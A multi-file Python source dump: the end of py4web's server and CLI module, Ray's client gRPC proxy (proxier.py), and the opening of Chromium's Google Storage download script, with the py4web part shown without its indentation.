Reloader.ROUTES = sorted(routes, key=lambda item: item["rule"])
ICECUBE.update(threadsafevariable.ThreadSafeVariable.freeze())
#########################################################################################
# Web Server and Reload Logic: Error Handling
#########################################################################################
ERROR_PAGES = {
"*": (
"<html><head><style>body{color:white;text-align: center;background-color:[[=color]];font-family:serif} "
"h1{font-size:6em;margin:16vh 0 8vh 0} h2{font-size:2em;margin:8vh 0} "
"a{color:white;text-decoration:none;font-weight:bold;padding:10px 10px;border-radius:10px;border:2px solid #fff;transition: all .5s ease} "
"a:hover{background:rgba(0,0,0,0.1);padding:10px 30px}</style></head>"
'<body><h1>[[=code]]</h1><h2>[[=message]]</h2>[[if button_text:]]<a href="[[=href]]">[[=button_text]]</a>[[pass]]</body></html>'
),
}
def error_page(code, button_text=None, href="#", color=None, message=None):
message = http.client.responses[code].upper() if message is None else message
color = (
{"4": "#F44336", "5": "#607D8B"}.get(str(code)[0], "#2196F3")
if not color
else color
)
context = dict(
code=code, message=message, button_text=button_text, href=href, color=color
)
# if client accepts 'application/json' - return json
if re.search(REGEX_APPJSON, request.headers.get("accept", "")):
response.status = code
return json.dumps(context)
# else - return html error-page
content = ERROR_PAGES.get(code) or ERROR_PAGES["*"]
return render(content=content, context=context, delimiters="[[ ]]")
@bottle.error(404)
def error404(error):
guess_app_name = (
"index"
if request.environ.get("HTTP_X_PY4WEB_APPNAME")
else request.path.split("/")[1]
)
if guess_app_name == "index":
href = "/"
else:
href = "/" + guess_app_name
script_name = (
request.environ.get("SCRIPT_NAME", "")
or request.environ.get("HTTP_X_SCRIPT_NAME", "")
).rstrip("/")
if script_name:
href = script_name + href
return error_page(404, button_text=guess_app_name, href=href)
#########################################################################################
# Web Server and Reload Logic: Operations
#########################################################################################
DIRTY_APPS = dict() # apps that need to be reloaded (lazy watching)
APP_WATCH = {"files": dict(), "handlers": OrderedDict(), "tasks": dict()}
""" Decorator that binds a func as an watchdog handler of non-'.py' files.
Paths to files must be relative to app, w/o app name(folder).
@app_watch_handler(['static/sass/all.sass', 'static/sass/main.sass'])
def sass_compile(changed_files):
print(changed_files); # paths of files that changed, for info
sass.compile()
"""
def app_watch_handler(watched_app_subpaths):
stack = inspect.stack
invoker = pathlib.Path(stack()[1].filename)
apps_path = pathlib.Path(os.environ["PY4WEB_APPS_FOLDER"])
app = invoker.relative_to(os.environ["PY4WEB_APPS_FOLDER"]).parts[0]
def decorator(func):
handler = "{}.{}".format(func.__module__, func.__name__)
APP_WATCH["handlers"][handler] = func
for subpath in watched_app_subpaths:
app_path = apps_path.joinpath(app, subpath).as_posix()
if app_path not in APP_WATCH["files"]:
APP_WATCH["files"][app_path] = []
APP_WATCH["files"][app_path].append(handler)
return func
return decorator
def try_app_watch_tasks():
if APP_WATCH["tasks"]:
tried_tasks = []
for handler in APP_WATCH["tasks"]:
changed_files_dict = APP_WATCH["tasks"][handler]
try:
APP_WATCH["handlers"][handler](changed_files_dict.keys())
tried_tasks.append(handler)
except Exception:
logging.error(traceback.format_exc())
## remove executed tasks from register
for handler in tried_tasks:
del APP_WATCH["tasks"][handler]
def watch(apps_folder, server_config, mode="sync"):
def watch_folder_event_loop(apps_folder):
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(watch_folder(apps_folder))
async def watch_folder(apps_folder):
click.echo(
"watching (%s-mode) python file changes in: %s" % (mode, apps_folder)
)
async for changes in awatch(os.path.join(apps_folder)):
apps = []
for subpath in [pathlib.Path(pair[1]) for pair in changes]:
name = subpath.relative_to(apps_folder).parts[0]
if subpath.suffix == ".py":
apps.append(name)
## manage `app_watch_handler` decorators
elif subpath.as_posix() in APP_WATCH["files"]:
handlers = APP_WATCH["files"][subpath.as_posix()]
for handler in handlers:
if handler not in APP_WATCH["tasks"]:
APP_WATCH["tasks"][handler] = {}
APP_WATCH["tasks"][handler][subpath.as_posix()] = True
for name in apps:
if mode == "lazy":
DIRTY_APPS[name] = True
else:
Reloader.import_app(name)
## in 'lazy' mode it's done in bottle's 'before_request' hook
if mode != "lazy":
try_app_watch_tasks()
if server_config["number_workers"] > 1:
click.echo("--watch option has no effect in multi-process environment \n")
return
elif server_config["server"].startswith(("wsgiref", "waitress", "rocket")):
# these servers block the main thread so we open a new thread for the file watcher
threading.Thread(
target=watch_folder_event_loop, args=(apps_folder,), daemon=True
).start()
elif server_config["server"] == "tornado":
if server_config["platform"] == "windows" and sys.version_info >= (3, 8):
# see https://bugs.python.org/issue37373 FIX: tornado/py3.8 on window
asyncio.set_event_loop_policy(asyncio.WindowsSelectorEventLoopPolicy())
# tornado delegate to asyncio so we add a future into the event loop
asyncio.ensure_future(watch_folder(apps_folder))
elif server_config["server"].startswith("gevent"):
watch_folder_event_loop(apps_folder)
else:
# should never happen
return
if mode == "lazy":
Reloader.install_reloader_hook()
def start_server(kwargs):
host = kwargs["host"]
port = int(kwargs["port"])
apps_folder = kwargs["apps_folder"]
number_workers = kwargs["number_workers"]
params = dict(host=host, port=port, reloader=False)
server_config = dict(
platform=platform.system().lower(),
server=None if kwargs["server"] == "default" else kwargs["server"],
number_workers=number_workers,
)
if not server_config["server"]:
if server_config["platform"] == "windows" or number_workers < 2:
server_config["server"] = "rocket"
else:
if not gunicorn:
logging.error("gunicorn not installed")
return
server_config["server"] = "gunicorn"
# Catch interrupts like Ctrl-C if needed
if server_config["server"] not in {"rocket", "wsgirefWsTwistedServer"}:
        signal.signal(
            signal.SIGINT,
            # echo first, then exit; the original `and` chain called sys.exit()
            # while evaluating click.echo's argument, so the message never printed
            lambda signum, frame: (
                click.echo(
                    "KeyboardInterrupt (ID: {}) has been caught. "
                    "Cleaning up...".format(signum)
                ),
                sys.exit(0),
            ),
        )
params["server"] = server_config["server"]
if params["server"] in server_adapters.__all__:
params["server"] = getattr(server_adapters, params["server"])()
if number_workers > 1:
params["workers"] = number_workers
if server_config["server"] == "gunicorn":
sys.argv[:] = sys.argv[:1] # else break gunicorn
if kwargs["ssl_cert"] is not None:
params["certfile"] = kwargs["ssl_cert"]
params["keyfile"] = kwargs["ssl_key"]
if server_config["server"] == "gevent":
if not hasattr(_ssl, "sslwrap"):
_ssl.sslwrap = new_sslwrap
if kwargs["watch"] != "off":
watch(apps_folder, server_config, kwargs["watch"])
bottle.run(**params)
def check_compatible(version):
"""To be called by apps to check if module version is compatible with py4web requirements"""
from . import __version__
return tuple(map(int, __version__.split("."))) >= tuple(
map(int, version.split("."))
)
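# Illustrative example (hypothetical version numbers): if py4web's __version__
# were "1.2.3", check_compatible("1.2") -> True since (1, 2, 3) >= (1, 2),
# while check_compatible("1.3") -> False.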
#########################################################################################
# WSGI Adapter
#########################################################################################
class MetaPathRouter:
"""
Instances of this class makes alias for a package name,
in other words instruct the import system to route request
for a package alias, i.e.:
MetaPathRouter("pkg", "pkg_alias")
import pkg_alias.sub
works as
import pkg.sub
author: Paolo Pastori
"""
def __init__(self, pkg, pkg_alias="apps"):
assert pkg_alias
assert pkg
if pkg != pkg_alias:
self.pkg_alias = pkg_alias
self.pkg = pkg
# register as path finder
sys.meta_path.append(self)
def find_spec(self, fullname, path=None, target=None):
if fullname == self.pkg_alias and path is None:
spec = importlib.util.find_spec(self.pkg)
if spec:
spec.name = fullname
spec.loader = importlib.machinery.SourceFileLoader(
fullname, spec.origin
)
return spec
def install_args(kwargs, reinstall_apps=False):
# always convert apps_folder to an absolute path
apps_folder = kwargs["apps_folder"] = os.path.abspath(kwargs["apps_folder"])
kwargs["service_folder"] = os.path.join(
kwargs["apps_folder"], DEFAULTS["PY4WEB_SERVICE_FOLDER"]
)
kwargs["service_db_uri"] = DEFAULTS["PY4WEB_SERVICE_DB_URI"]
for key, val in kwargs.items():
os.environ["PY4WEB_" + key.upper()] = str(val)
Fixture.__fixture_debug__ = kwargs.get("fixture_debug", False)
logging.getLogger().setLevel(
0 if Fixture.__fixture_debug__ else kwargs.get("logging_level", logging.WARNING)
)
yes2 = yes = kwargs.get("yes", False)
# If the apps folder does not exist create it and populate it
if not os.path.exists(apps_folder):
if yes or click.confirm("Create missing folder %s?" % apps_folder):
os.makedirs(apps_folder)
yes2 = True
else:
click.echo("Command aborted")
sys.exit(0)
init_py = os.path.join(apps_folder, "__init__.py")
if not os.path.exists(init_py):
if yes2 or click.confirm("Create missing init file %s?" % init_py):
with open(init_py, "wb"):
pass
else:
click.echo("Command aborted")
sys.exit(0)
# ensure that "import apps.someapp" works
apps_folder_parent, apps_folder_name = os.path.split(apps_folder)
if apps_folder_parent not in sys.path:
sys.path.insert(0, apps_folder_parent)
if apps_folder_name != "apps":
MetaPathRouter(apps_folder_name)
if not os.path.exists(kwargs["service_folder"]):
os.mkdir(kwargs["service_folder"])
session_secret_filename = os.path.join(kwargs["service_folder"], "session.secret")
if not os.path.exists(session_secret_filename):
with open(session_secret_filename, "w") as fp:
fp.write(str(uuid.uuid4()))
with open(session_secret_filename) as fp:
Session.SECRET = fp.read()
    # after everything is set up but before installing apps, initialize the error logger
error_logger.initialize()
# Reinstall apps from zipped ones in assets
if reinstall_apps:
assets_dir = os.path.join(os.path.dirname(__file__), "assets")
if os.path.exists(assets_dir):
apps = os.listdir(assets_dir)
for filename in apps:
zip_filename = os.path.join(assets_dir, filename)
# These filenames do not necessarily exist if one has
# downloaded from source and deleted them.
app_name = filename.split(".")[-2]
target_dir = os.path.join(apps_folder, app_name)
if not os.path.exists(target_dir):
if yes or click.confirm("Create app %s?" % app_name):
click.echo("[ ] Unzipping app %s" % filename)
with zipfile.ZipFile(zip_filename, "r") as zip_file:
os.makedirs(target_dir)
zip_file.extractall(target_dir)
click.echo("\x1b[A[X]")
def wsgi(**kwargs):
"""Initializes everything, loads apps, returns the wsgi app"""
install_args(kwargs)
Reloader.import_apps()
return bottle.default_app()
#########################################################################################
# CLI
#########################################################################################
@click.group(
context_settings=dict(help_option_names=["-h", "-help", "--help"]),
help='%s\n\nType "%s COMMAND -h" for available options on commands'
% (__doc__, PY4WEB_CMD),
)
def cli():
pass
@cli.command()
@click.option(
"-a", "--all", is_flag=True, default=False, help="List version of all modules"
)
def version(all):
"""Show versions and exit"""
from . import __version__
click.echo("py4web: %s" % __version__)
if all:
click.echo("system: %s" % platform.platform())
click.echo("python: %s" % sys.version.replace("\n", " "))
for name in sorted(sys.modules):
if hasattr(sys.modules[name], "__version__"):
click.echo("%s: %s" % (name, sys.modules[name].__version__))
@cli.command()
@click.argument("apps_folder")
@click.option(
"-Y",
"--yes",
is_flag=True,
default=False,
help="No prompt, assume yes to questions",
show_default=True,
)
def setup(**kwargs):
"""Setup new apps folder or reinstall it"""
install_args(kwargs, reinstall_apps=True)
@cli.command()
@click.argument("apps_folder", type=click.Path(exists=True))
@click.option(
"-Y",
"--yes",
is_flag=True,
default=False,
help="No prompt, assume yes to questions",
show_default=True,
)
def shell(**kwargs):
"""Open a python shell with apps_folder's parent added to the path"""
install_args(kwargs)
code.interact(local=dict(globals(), **locals()))
@cli.command()
@click.argument("apps_folder", type=click.Path(exists=True))
@click.argument("func")
@click.option(
"-Y",
"--yes",
is_flag=True,
default=False,
help="No prompt, assume yes to questions",
show_default=True,
)
@click.option(
"--args",
default="{}",
help="Arguments passed to the program/function",
show_default=True,
)
def call(apps_folder, func, yes, args):
"""Call a function inside apps_folder"""
kwargs = json.loads(args)
install_args(dict(apps_folder=apps_folder, yes=yes))
apps_folder_name = os.path.basename(os.environ["PY4WEB_APPS_FOLDER"])
app_name = func.split(".")[0]
module, name = ("%s.%s" % (apps_folder_name, func)).rsplit(".", 1)
env = {}
exec("from %s import %s" % (module, name), {}, env)
request.app_name = app_name
env[name](**kwargs)
@cli.command(name="set_password")
@click.option(
"--password",
prompt=True,
confirmation_prompt=True,
hide_input=True,
help="Password value (asked if missing)",
)
@click.option(
"-p",
"--password_file",
default="password.txt",
help="File for the encrypted password",
show_default=True,
)
def set_password(password, password_file):
"""Set administrator's password for the Dashboard"""
click.echo('Storing the hashed password in file "%s"\n' % password_file)
with open(password_file, "w") as fp:
fp.write(str(pydal.validators.CRYPT()(password)[0]))
@cli.command(name="new_app")
@click.argument("apps_folder")
@click.argument("app_name")
@click.option(
"-Y",
"--yes",
is_flag=True,
default=False,
help="No prompt, assume yes to questions",
show_default=True,
)
@click.option(
"-s",
"--scaffold_zip",
default=None,
help="Path to the zip with the scaffolding app",
show_default=False,
)
def new_app(apps_folder, app_name, yes, scaffold_zip):
"""Create a new app copying the scaffolding one"""
install_args(dict(apps_folder=apps_folder, yes=yes))
source = scaffold_zip or os.path.join(
os.path.dirname(__file__), "assets", "py4web.app._scaffold.zip"
)
target_dir = os.path.join(os.environ["PY4WEB_APPS_FOLDER"], app_name)
if not os.path.exists(source):
        click.echo("Source app %s does not exist" % source)
sys.exit(1)
elif os.path.exists(target_dir):
click.echo("Target folder %s already exists" % target_dir)
sys.exit(1)
else:
zfile = zipfile.ZipFile(source, "r")
zfile.extractall(target_dir)
zfile.close()
@cli.command()
@click.argument("apps_folder", type=click.Path(exists=True))
@click.option(
"-Y",
"--yes",
is_flag=True,
default=False,
help="No prompt, assume yes to questions",
show_default=True,
)
@click.option("-H", "--host", default="127.0.0.1", help="Host name", show_default=True)
@click.option(
"-P", "--port", default=8000, type=int, help="Port number", show_default=True
)
@click.option(
"-p",
"--password_file",
default="password.txt",
help="File for the encrypted password",
show_default=True,
)
@click.option(
"-s",
"--server",
default="default",
type=click.Choice(
["default", "wsgiref", "tornado", "gunicorn", "gevent", "waitress"]
+ server_adapters.__all__
),
help="server to use",
show_default=True,
)
@click.option(
"-w",
"--number_workers",
default=0,
type=int,
help="Number of workers",
show_default=True,
)
@click.option(
"-d",
"--dashboard_mode",
default="full",
help="Dashboard mode: demo, readonly, full, none",
show_default=True,
)
@click.option(
"--watch",
default="lazy",
type=click.Choice(["off", "sync", "lazy"]),
help="Watch python changes and reload apps automatically, modes: off, sync, lazy",
show_default=True,
)
@click.option(
"--ssl_cert", type=click.Path(exists=True), help="SSL certificate file for HTTPS"
)
@click.option("--ssl_key", type=click.Path(exists=True), help="SSL key file for HTTPS")
@click.option(
"--errorlog",
default=":stderr",
help="Where to send error logs (:stdout|:stderr|tickets_only|{filename})",
show_default=True,
)
@click.option(
"-L",
"--logging_level",
type=int,
default=logging.WARNING,
help="The log level (0 - 50) [default: 30 (=WARNING)]",
)
@click.option(
"-D",
"--debug",
is_flag=True,
default=False,
help="Debug switch",
show_default=True,
)
def run(**kwargs):
"""Run all the applications on apps_folder"""
install_args(kwargs)
from py4web import __version__
click.secho(ART, fg="blue")
click.echo("Py4web: %s on Python %s\n\n" % (__version__, sys.version))
# If we know where the password is stored, read it, otherwise ask for one
if os.path.exists(os.path.join(os.environ["PY4WEB_APPS_FOLDER"], "_dashboard")):
if kwargs["dashboard_mode"] not in ("demo", "none") and not os.path.exists(
kwargs["password_file"]
):
click.echo(
'You have not set a dashboard password. Run "%s set_password" to do so.'
% PY4WEB_CMD
)
else:
click.echo(
"Dashboard is at: http://%s:%s/_dashboard"
% (kwargs["host"], kwargs["port"])
)
# Start
Reloader.import_apps()
start_server(kwargs)
if __name__ == "__main__":
cli()
|
proxier.py
|
import atexit
from concurrent import futures
from dataclasses import dataclass
import grpc
import logging
from itertools import chain
import json
import socket
import sys
from threading import Lock, Thread, RLock
import time
import traceback
from typing import Any, Callable, Dict, List, Optional, Tuple
import ray
from ray.cloudpickle.compat import pickle
from ray.job_config import JobConfig
import ray.core.generated.ray_client_pb2 as ray_client_pb2
import ray.core.generated.ray_client_pb2_grpc as ray_client_pb2_grpc
from ray.util.client.common import (ClientServerHandle,
CLIENT_SERVER_MAX_THREADS, GRPC_OPTIONS)
from ray._private.parameter import RayParams
from ray._private.services import ProcessInfo, start_ray_client_server
from ray._private.utils import detect_fate_sharing_support
# Import psutil after ray so the packaged version is used.
import psutil
logger = logging.getLogger(__name__)
CHECK_PROCESS_INTERVAL_S = 30
MIN_SPECIFIC_SERVER_PORT = 23000
MAX_SPECIFIC_SERVER_PORT = 24000
CHECK_CHANNEL_TIMEOUT_S = 10
LOGSTREAM_RETRIES = 5
LOGSTREAM_RETRY_INTERVAL_SEC = 2
def _get_client_id_from_context(context: Any) -> str:
"""
Get `client_id` from gRPC metadata. If the `client_id` is not present,
this function logs an error and sets the status_code.
"""
metadata = {k: v for k, v in context.invocation_metadata()}
client_id = metadata.get("client_id") or ""
if client_id == "":
logger.error("Client connecting with no client_id")
context.set_code(grpc.StatusCode.INVALID_ARGUMENT)
return client_id
@dataclass
class SpecificServer:
port: int
process_handle_future: futures.Future
channel: "grpc._channel.Channel"
def wait_ready(self, timeout: Optional[float] = None) -> None:
"""
Wait for the server to actually start up.
"""
res = self.process_handle_future.result(timeout=timeout)
if res is None:
# This is only set to none when server creation specifically fails.
raise RuntimeError("Server startup failed.")
def poll(self) -> Optional[int]:
"""Check if the process has exited."""
try:
proc = self.process_handle_future.result(timeout=0.1)
if proc is not None:
return proc.process.poll()
except futures.TimeoutError:
return
def kill(self) -> None:
"""Try to send a KILL signal to the process."""
try:
proc = self.process_handle_future.result(timeout=0.1)
if proc is not None:
proc.process.kill()
except futures.TimeoutError:
# Server has not been started yet.
pass
def set_result(self, proc: Optional[ProcessInfo]) -> None:
"""Set the result of the internal future if it is currently unset."""
if not self.process_handle_future.done():
self.process_handle_future.set_result(proc)
def _match_running_client_server(command: List[str]) -> bool:
"""
Detects if the main process in the given command is the RayClient Server.
    This works by ensuring that the first three arguments are similar to:
<python> -m ray.util.client.server
"""
flattened = " ".join(command)
rejoined = flattened.split()
if len(rejoined) < 3:
return False
return rejoined[1:3] == ["-m", "ray.util.client.server"]
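# Illustrative example (hypothetical command line): a process started as
#   ["/usr/bin/python", "-m", "ray.util.client.server", "--port=23000"]
# matches, because tokens 1:3 equal ["-m", "ray.util.client.server"].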
class ProxyManager():
def __init__(self,
redis_address: Optional[str],
*,
session_dir: Optional[str] = None,
redis_password: Optional[str] = None):
self.servers: Dict[str, SpecificServer] = dict()
self.server_lock = RLock()
self._redis_address = redis_address
self._redis_password = redis_password
self._free_ports: List[int] = list(
range(MIN_SPECIFIC_SERVER_PORT, MAX_SPECIFIC_SERVER_PORT))
self._check_thread = Thread(target=self._check_processes, daemon=True)
self._check_thread.start()
self.fate_share = bool(detect_fate_sharing_support())
self._node: Optional[ray.node.Node] = None
atexit.register(self._cleanup)
def _get_unused_port(self) -> int:
"""
Search for a port in _free_ports that is unused.
"""
with self.server_lock:
num_ports = len(self._free_ports)
for _ in range(num_ports):
port = self._free_ports.pop(0)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind(("", port))
except OSError:
self._free_ports.append(port)
continue
finally:
s.close()
return port
            raise RuntimeError("Unable to find an unused port.")
@property
def redis_address(self) -> str:
"""
Returns the provided Ray Redis address, or creates a new cluster.
"""
if self._redis_address:
return self._redis_address
# Start a new, locally scoped cluster.
connection_tuple = ray.init()
self._redis_address = connection_tuple["redis_address"]
self._session_dir = connection_tuple["session_dir"]
return self._redis_address
@property
def node(self) -> ray.node.Node:
"""Gets a 'ray.Node' object for this node (the head node).
If it does not already exist, one is created using the redis_address.
"""
if self._node:
return self._node
ray_params = RayParams(redis_address=self.redis_address)
if self._redis_password:
ray_params.redis_password = self._redis_password
self._node = ray.node.Node(
ray_params,
head=False,
shutdown_at_exit=False,
spawn_reaper=False,
connect_only=True)
return self._node
def create_specific_server(self, client_id: str) -> SpecificServer:
"""
        Create, but do not start, a SpecificServer for a given client. This
method must be called once per client.
"""
with self.server_lock:
assert self.servers.get(client_id) is None, (
f"Server already created for Client: {client_id}")
port = self._get_unused_port()
server = SpecificServer(
port=port,
process_handle_future=futures.Future(),
channel=grpc.insecure_channel(
f"localhost:{port}", options=GRPC_OPTIONS))
self.servers[client_id] = server
return server
def start_specific_server(self, client_id: str,
job_config: JobConfig) -> bool:
"""
Start up a RayClient Server for an incoming client to
communicate with. Returns whether creation was successful.
"""
specific_server = self._get_server_for_client(client_id)
assert specific_server, f"Server has not been created for: {client_id}"
serialized_runtime_env = job_config.get_serialized_runtime_env()
output, error = self.node.get_log_file_handles(
f"ray_client_server_{specific_server.port}", unique=True)
proc = start_ray_client_server(
self.redis_address,
specific_server.port,
stdout_file=output,
stderr_file=error,
fate_share=self.fate_share,
server_type="specific-server",
serialized_runtime_env=serialized_runtime_env,
session_dir=self.node.get_session_dir_path(),
redis_password=self._redis_password)
        # Wait for the process being run to transition from the shim process
# to the actual RayClient Server.
pid = proc.process.pid
if sys.platform != "win32":
psutil_proc = psutil.Process(pid)
        else:
            # Don't use `psutil` on Win32
            psutil_proc = None
while psutil_proc is not None:
if proc.process.poll() is not None:
logger.error(
f"SpecificServer startup failed for client: {client_id}")
break
cmd = psutil_proc.cmdline()
if _match_running_client_server(cmd):
break
logger.debug(
"Waiting for Process to reach the actual client server.")
time.sleep(0.5)
specific_server.set_result(proc)
logger.info(f"SpecificServer started on port: {specific_server.port} "
f"with PID: {pid} for client: {client_id}")
return proc.process.poll() is None
def _get_server_for_client(self,
client_id: str) -> Optional[SpecificServer]:
with self.server_lock:
client = self.servers.get(client_id)
if client is None:
logger.error(f"Unable to find channel for client: {client_id}")
return client
def get_channel(
self,
client_id: str,
) -> Optional["grpc._channel.Channel"]:
"""
Find the gRPC Channel for the given client_id. This will block until
the server process has started.
"""
server = self._get_server_for_client(client_id)
if server is None:
return None
# Wait for the SpecificServer to become ready.
server.wait_ready()
try:
grpc.channel_ready_future(
server.channel).result(timeout=CHECK_CHANNEL_TIMEOUT_S)
return server.channel
except grpc.FutureTimeoutError:
logger.exception(f"Timeout waiting for channel for {client_id}")
return None
def _check_processes(self):
"""
Keeps the internal servers dictionary up-to-date with running servers.
"""
while True:
with self.server_lock:
for client_id, specific_server in list(self.servers.items()):
if specific_server.poll() is not None:
del self.servers[client_id]
# Port is available to use again.
self._free_ports.append(specific_server.port)
time.sleep(CHECK_PROCESS_INTERVAL_S)
def _cleanup(self) -> None:
"""
Forcibly kill all spawned RayClient Servers. This ensures cleanup
for platforms where fate sharing is not supported.
"""
for server in self.servers.values():
server.kill()
class RayletServicerProxy(ray_client_pb2_grpc.RayletDriverServicer):
def __init__(self, ray_connect_handler: Callable,
proxy_manager: ProxyManager):
self.proxy_manager = proxy_manager
self.ray_connect_handler = ray_connect_handler
def _call_inner_function(
self, request, context,
method: str) -> Optional[ray_client_pb2_grpc.RayletDriverStub]:
client_id = _get_client_id_from_context(context)
chan = self.proxy_manager.get_channel(client_id)
if not chan:
logger.error(f"Channel for Client: {client_id} not found!")
context.set_code(grpc.StatusCode.NOT_FOUND)
return None
stub = ray_client_pb2_grpc.RayletDriverStub(chan)
try:
return getattr(stub, method)(
request, metadata=[("client_id", client_id)])
except Exception:
logger.exception(f"Proxying call to {method} failed!")
def Init(self, request, context=None) -> ray_client_pb2.InitResponse:
return self._call_inner_function(request, context, "Init")
def PrepRuntimeEnv(self, request,
context=None) -> ray_client_pb2.PrepRuntimeEnvResponse:
return self._call_inner_function(request, context, "PrepRuntimeEnv")
def KVPut(self, request, context=None) -> ray_client_pb2.KVPutResponse:
return self._call_inner_function(request, context, "KVPut")
def KVGet(self, request, context=None) -> ray_client_pb2.KVGetResponse:
return self._call_inner_function(request, context, "KVGet")
def KVDel(self, request, context=None) -> ray_client_pb2.KVDelResponse:
        return self._call_inner_function(request, context, "KVDel")
def KVList(self, request, context=None) -> ray_client_pb2.KVListResponse:
return self._call_inner_function(request, context, "KVList")
def KVExists(self, request,
context=None) -> ray_client_pb2.KVExistsResponse:
return self._call_inner_function(request, context, "KVExists")
def ListNamedActors(self, request, context=None
) -> ray_client_pb2.ClientListNamedActorsResponse:
return self._call_inner_function(request, context, "ListNamedActors")
def ClusterInfo(self, request,
context=None) -> ray_client_pb2.ClusterInfoResponse:
# NOTE: We need to respond to the PING request here to allow the client
# to continue with connecting.
if request.type == ray_client_pb2.ClusterInfoType.PING:
resp = ray_client_pb2.ClusterInfoResponse(json=json.dumps({}))
return resp
return self._call_inner_function(request, context, "ClusterInfo")
def Terminate(self, req, context=None):
return self._call_inner_function(req, context, "Terminate")
def GetObject(self, request, context=None):
return self._call_inner_function(request, context, "GetObject")
def PutObject(self, request: ray_client_pb2.PutRequest,
context=None) -> ray_client_pb2.PutResponse:
return self._call_inner_function(request, context, "PutObject")
def WaitObject(self, request, context=None) -> ray_client_pb2.WaitResponse:
return self._call_inner_function(request, context, "WaitObject")
def Schedule(self, task, context=None) -> ray_client_pb2.ClientTaskTicket:
return self._call_inner_function(task, context, "Schedule")
def ray_client_server_env_prep(job_config: JobConfig) -> JobConfig:
return job_config
def prepare_runtime_init_req(init_request: ray_client_pb2.DataRequest
) -> Tuple[ray_client_pb2.DataRequest, JobConfig]:
"""
Extract JobConfig and possibly mutate InitRequest before it is passed to
the specific RayClient Server.
"""
init_type = init_request.WhichOneof("type")
assert init_type == "init", ("Received initial message of type "
f"{init_type}, not 'init'.")
req = init_request.init
job_config = JobConfig()
if req.job_config:
job_config = pickle.loads(req.job_config)
new_job_config = ray_client_server_env_prep(job_config)
modified_init_req = ray_client_pb2.InitRequest(
job_config=pickle.dumps(new_job_config))
init_request.init.CopyFrom(modified_init_req)
return (init_request, new_job_config)
class DataServicerProxy(ray_client_pb2_grpc.RayletDataStreamerServicer):
def __init__(self, proxy_manager: ProxyManager):
self.num_clients = 0
self.clients_lock = Lock()
self.proxy_manager = proxy_manager
def modify_connection_info_resp(self,
init_resp: ray_client_pb2.DataResponse
) -> ray_client_pb2.DataResponse:
"""
        Modify the `num_clients` returned in the ConnectionInfoResponse because
individual SpecificServers only have **one** client.
"""
init_type = init_resp.WhichOneof("type")
if init_type != "connection_info":
return init_resp
modified_resp = ray_client_pb2.DataResponse()
modified_resp.CopyFrom(init_resp)
with self.clients_lock:
modified_resp.connection_info.num_clients = self.num_clients
return modified_resp
def Datapath(self, request_iterator, context):
client_id = _get_client_id_from_context(context)
if client_id == "":
return
# Create Placeholder *before* reading the first request.
server = self.proxy_manager.create_specific_server(client_id)
try:
with self.clients_lock:
self.num_clients += 1
logger.info(f"New data connection from client {client_id}: ")
init_req = next(request_iterator)
try:
modified_init_req, job_config = prepare_runtime_init_req(
init_req)
if not self.proxy_manager.start_specific_server(
client_id, job_config):
logger.error(
f"Server startup failed for client: {client_id}, "
f"using JobConfig: {job_config}!")
raise RuntimeError(
"Starting up Server Failed! Check "
"`ray_client_server_[port].err` on the cluster.")
channel = self.proxy_manager.get_channel(client_id)
if channel is None:
logger.error(f"Channel not found for {client_id}")
raise RuntimeError(
"Proxy failed to Connect to backend! Check "
"`ray_client_server.err` on the cluster.")
stub = ray_client_pb2_grpc.RayletDataStreamerStub(channel)
except Exception:
init_resp = ray_client_pb2.DataResponse(
init=ray_client_pb2.InitResponse(
ok=False, msg=traceback.format_exc()))
init_resp.req_id = init_req.req_id
yield init_resp
return None
new_iter = chain([modified_init_req], request_iterator)
resp_stream = stub.Datapath(
new_iter, metadata=[("client_id", client_id)])
for resp in resp_stream:
yield self.modify_connection_info_resp(resp)
except Exception:
logger.exception("Proxying Datapath failed!")
finally:
server.set_result(None)
with self.clients_lock:
logger.debug(f"Client detached: {client_id}")
self.num_clients -= 1
class LogstreamServicerProxy(ray_client_pb2_grpc.RayletLogStreamerServicer):
def __init__(self, proxy_manager: ProxyManager):
super().__init__()
self.proxy_manager = proxy_manager
def Logstream(self, request_iterator, context):
client_id = _get_client_id_from_context(context)
if client_id == "":
return
logger.debug(f"New logstream connection from client {client_id}: ")
channel = None
# We need to retry a few times because the LogClient *may* connect
        # before the DataClient has finished connecting.
for i in range(LOGSTREAM_RETRIES):
channel = self.proxy_manager.get_channel(client_id)
if channel is not None:
break
logger.warning(
f"Retrying Logstream connection. {i+1} attempts failed.")
time.sleep(LOGSTREAM_RETRY_INTERVAL_SEC)
if channel is None:
context.set_code(grpc.StatusCode.UNAVAILABLE)
return None
stub = ray_client_pb2_grpc.RayletLogStreamerStub(channel)
resp_stream = stub.Logstream(
request_iterator, metadata=[("client_id", client_id)])
try:
for resp in resp_stream:
yield resp
except Exception:
logger.exception("Proxying Logstream failed!")
def serve_proxier(connection_str: str,
redis_address: str,
*,
redis_password: Optional[str] = None,
session_dir: Optional[str] = None):
server = grpc.server(
futures.ThreadPoolExecutor(max_workers=CLIENT_SERVER_MAX_THREADS),
options=GRPC_OPTIONS)
proxy_manager = ProxyManager(
redis_address, session_dir=session_dir, redis_password=redis_password)
task_servicer = RayletServicerProxy(None, proxy_manager)
data_servicer = DataServicerProxy(proxy_manager)
logs_servicer = LogstreamServicerProxy(proxy_manager)
ray_client_pb2_grpc.add_RayletDriverServicer_to_server(
task_servicer, server)
ray_client_pb2_grpc.add_RayletDataStreamerServicer_to_server(
data_servicer, server)
ray_client_pb2_grpc.add_RayletLogStreamerServicer_to_server(
logs_servicer, server)
server.add_insecure_port(connection_str)
server.start()
return ClientServerHandle(
task_servicer=task_servicer,
data_servicer=data_servicer,
logs_servicer=logs_servicer,
grpc_server=server,
)
|
download_from_google_storage.py
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Download files from Google Storage based on SHA1 sums."""
import hashlib
import optparse
import os
import Queue
import re
import stat
import sys
import threading
import time
import subprocess2
GSUTIL_DEFAULT_PATH = os.path.join(
os.path.dirname(os.path.abspath(__file__)), 'gsutil.py')
# Maps sys.platform to what we actually want to call them.
PLATFORM_MAPPING = {
'cygwin': 'win',
'darwin': 'mac',
'linux2': 'linux',
'win32': 'win',
}
class FileNotFoundError(IOError):
pass
class InvalidFileError(IOError):
pass
class InvalidPlatformError(Exception):
pass
def GetNormalizedPlatform():
"""Returns the result of sys.platform accounting for cygwin.
